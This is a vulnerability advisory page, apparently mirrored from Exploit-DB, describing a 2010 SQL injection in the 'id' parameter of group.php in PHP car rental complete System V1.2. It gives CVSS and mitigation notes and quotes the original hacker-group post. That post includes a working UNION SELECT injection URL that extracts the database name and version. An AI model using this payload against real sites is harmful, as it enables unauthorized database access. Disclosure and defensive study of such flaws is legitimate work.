PHP car rental complete System V1.2 SQli vulnerability

vendor:

PHP car rental complete System

by:

Sid3^effects

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: PHP car rental complete System

Affected Version From: V1.2

Affected Version To: V1.2

Patch Exists: NO

Related CWE: N/A

CPE: a:nuno_pereira:php_car_rental_complete_system

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

PHP car rental complete System V1.2 SQli vulnerability

PHP Car Rental-Script suffers from a SQL Injection vulnerability which allows an attacker to execute arbitrary SQL commands on the vulnerable system. The vulnerability is present in the 'group.php' script, where the 'id' parameter is not properly sanitized before being used in a SQL query.

Mitigation:

Input validation should be used to prevent SQL Injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Title:PHP car rental complete System V1.2 SQli vulnerability
# Author: Sid3^effects
# Published: 2010-06-06 
# price:450 EURo
# email:shell_c99@yahoo.com
# vendor: NUNO PEREIRA
# url : http://www.acarhire.me.uk/
############################################################################
        ooooo  .oooooo.  oooooo   oooooo     oooo 
        `888' d8P'  `Y8b  `888.    `888.     .8' 
         888 888           `888.   .8888.   .8' 
         888 888            `888  .8'`888. .8' 
         888 888             `888.8'  `888.8'  
         888 `88b    ooo      `888'    `888' 
        o888o `Y8bood8P'       `8'      `8'    
                                          
-------------------------------------------------------------------------------------- 
#####################Sid3^effects aKa HaRi################################## 
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors] 
#Thanks:*L0rd ÇrusAdêr*,d4rk-blu™®,R45C4L,CR4C|< 008,M4n0j,MaYuR 
#ShouTZ:kedar,dec0d3r,41.w4r10r
#spl shoutz:LiquidWorm,gunslinger_ :D      
#Catch us at www.andhrahackers.com or www.teamicw.in 
############################################################################ 
Description :
PHP Car Rental-Script You can try our latest stable release as it becomes available. To launch the demo open both
the web site and control panel views so you can preview your changes as they are made in real time from the
control panel. its very simple to use for the client and for the administration to change prices aand add
promotions i also has a built in newsletter facility and email collection
############################################################################ 

Xploit :
   PHP car rental complete System V1.2 suffers from a sqli vulnerability..
  url:http://server/group.php?id=-2+union+select+1,database(),3,4,5,6,7,8,version(),10,11,12--
 
         
############################################################################ 
#spl thks: exploit-db team
#Sid3^effects